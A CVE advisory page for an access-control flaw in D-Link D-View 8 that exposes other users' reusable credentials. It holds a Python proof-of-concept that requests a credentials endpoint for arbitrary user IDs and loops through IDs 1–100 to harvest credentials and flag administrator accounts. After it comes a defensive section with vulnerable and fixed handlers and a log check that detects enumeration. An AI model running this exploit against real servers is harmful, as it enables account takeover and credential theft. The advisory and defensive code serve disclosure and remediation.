Security Vulnerability Report
CVE-2026-23754 CVSS 8.8 HIGH

CVE-2026-23754

Published: 2026-01-21 18:16:25
Last Modified: 2026-01-30 21:30:52

Description

D-Link D-View 8 versions 2.0.1.107 and below contain an improper access control vulnerability in backend API endpoints. Any authenticated user can supply an arbitrary user_id value to retrieve sensitive credential data belonging to other users, including super administrators. The exposed credential material can be reused directly as a valid authentication secret, allowing full impersonation of the targeted account. This results in complete account takeover and full administrative control over the D-View system.

CVSS Details

CVSS Score (v3.1, Primary)
8.8
Severity
HIGH
CVSS Vector (v3.1)
CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H
CVSS Score (v4.0, Secondary)
8.7 HIGH
CVSS Vector (v4.0)
CVSS:4.0/AV:N/AC:L/AT:N/PR:L/UI:N/VC:H/VI:H/VA:H/SC:N/SI:N/SA:N/E:X/CR:X/IR:X/AR:X/MAV:X/MAC:X/MAT:X/MPR:X/MUI:X/MVC:X/MVI:X/MVA:X/MSC:X/MSI:X/MSA:X/S:X/AU:X/R:X/V:X/RE:X/U:X
Weakness
CWE-639 (Authorization Bypass Through User-Controlled Key)

Configurations (Affected Products)

cpe:2.3:a:dlink:d-view_8:*:*:*:*:*:*:*:* - VULNERABLE
D-Link D-View 8 <= 2.0.1.107

PoC / Exploit Code

⚠ For Security Research Only
The following code is for security research and authorized testing only.
python
import requests
import json

# CVE-2026-23754 PoC - D-Link D-View 8 IDOR Credential Disclosure
# Target: D-Link D-View 8 <= 2.0.1.107

TARGET_URL = "http://target-dview-server.com"  # Replace with actual target URL


def exploit_idor(target, session_token, target_user_id):
    """
    Exploit IDOR vulnerability to retrieve user credentials

    Args:
        target: Target D-Link D-View 8 server URL
        session_token: Valid authentication token (from low-privilege user)
        target_user_id: ID of the target user to extract credentials from

    Returns:
        dict: Extracted user credential data
    """
    # API endpoint vulnerable to IDOR
    api_endpoint = f"{target}/api/v1/users/{target_user_id}/credentials"
    headers = {
        "Authorization": f"Bearer {session_token}",
        "Content-Type": "application/json",
    }
    try:
        response = requests.get(api_endpoint, headers=headers, timeout=30)
        if response.status_code == 200:
            return response.json()
        else:
            return {"error": f"HTTP {response.status_code}", "message": response.text}
    except requests.exceptions.RequestException as e:
        return {"error": "Request failed", "details": str(e)}


def enumerate_users(target, session_token, start_id=1, end_id=100):
    """
    Enumerate and extract credentials for multiple users

    Args:
        target: Target server URL
        session_token: Valid authentication token
        start_id: Starting user ID
        end_id: Ending user ID

    Returns:
        list: List of extracted user credentials
    """
    extracted_creds = []
    for user_id in range(start_id, end_id + 1):
        print(f"[*] Extracting credentials for user_id: {user_id}")
        creds = exploit_idor(target, session_token, user_id)
        if "error" not in creds:
            extracted_creds.append({"user_id": user_id, "credentials": creds})
            print(f"[+] SUCCESS: Extracted credentials for user {user_id}")
            # Check if user is admin/superadmin
            if creds.get("role") in ["admin", "superadmin"]:
                print(f"[!] ADMINISTRATOR CREDENTIALS FOUND: User ID {user_id}")
    return extracted_creds


if __name__ == "__main__":
    # Example usage
    # Replace with actual valid session token
    SESSION_TOKEN = "your_valid_auth_token_here"

    # Extract specific user's credentials
    target_creds = exploit_idor(TARGET_URL, SESSION_TOKEN, target_user_id=1)
    print(f"[*] Target user credentials: {json.dumps(target_creds, indent=2)}")

    # Or enumerate multiple users
    # all_creds = enumerate_users(TARGET_URL, SESSION_TOKEN, 1, 50)
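The access-control failure described in this advisory, modelled as an added example that is not from the advisory, from D-Link's code, or from the PoC above: a minimal handler with the vulnerable user_id lookup beside a hardened one that ties the key to the session and withholds the reusable secret, plus a log check that flags the per-session user_id enumeration such an endpoint invites. The user table, roles, session type, log format and session ids are constructed assumptions.

```python
import re
from collections import defaultdict
from dataclasses import dataclass

# Constructed sample user table; the auth_secret values are placeholders.
USERS = {
    1: {"username": "superadmin", "role": "superadmin", "auth_secret": "PLACEHOLDER-1"},
    7: {"username": "alice", "role": "operator", "auth_secret": "PLACEHOLDER-7"},
    9: {"username": "bob", "role": "operator", "auth_secret": "PLACEHOLDER-9"},
}

@dataclass(frozen=True)
class Session:
    user_id: int  # identity established at login, never taken from the request
    role: str

def get_credentials_vulnerable(session, target_user_id):
    """Vulnerable pattern (CWE-639): authenticated caller, but the caller-supplied
    user_id is the lookup key with no ownership check, and the secret is returned."""
    record = USERS.get(target_user_id)
    return dict(record) if record else None

def get_credentials_fixed(session, target_user_id):
    """Hardened: key must be the session's own user_id unless the role is
    superadmin, and the reusable secret is never part of any response."""
    if target_user_id != session.user_id and session.role != "superadmin":
        raise PermissionError("user_id does not belong to the session")
    record = USERS.get(target_user_id)
    if record is None:
        return None
    return {k: v for k, v in record.items() if k != "auth_secret"}

# Detection: a session reading credential records for many distinct user_ids is
# the enumeration pattern to alert on. Log format is an assumption, not D-View's.
LOG_RE = re.compile(r"session=(\S+) GET /api/v1/users/(\d+)/credentials")

SAMPLE_LOG = [  # constructed: s-abc walks seven ids, s-xyz reads only its own
    f"2026-01-21T18:00:{i:02d}Z session=s-abc GET /api/v1/users/{i}/credentials 200"
    for i in range(1, 8)
] + ["2026-01-21T18:01:00Z session=s-xyz GET /api/v1/users/7/credentials 200"]

def flag_enumeration(log_lines, threshold=5):
    """Return session ids that fetched credentials for >= threshold distinct users."""
    seen = defaultdict(set)
    for line in log_lines:
        m = LOG_RE.search(line)
        if m:
            seen[m.group(1)].add(int(m.group(2)))
    return sorted(s for s, ids in seen.items() if len(ids) >= threshold)
```

The superadmin branch still returns no secret: an administrator who needs to recover access to an account should go through a reset that issues a fresh credential, not read the existing one.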

References

https://supportannouncement.us.dlink.com/security/publication.aspx?name=SAP10471 (Vendor Advisory, Patch)
https://www.vulncheck.com/advisories/dlink-dview-8-idor-allows-credential-disclosure-and-account-takeover (Third Party Advisory)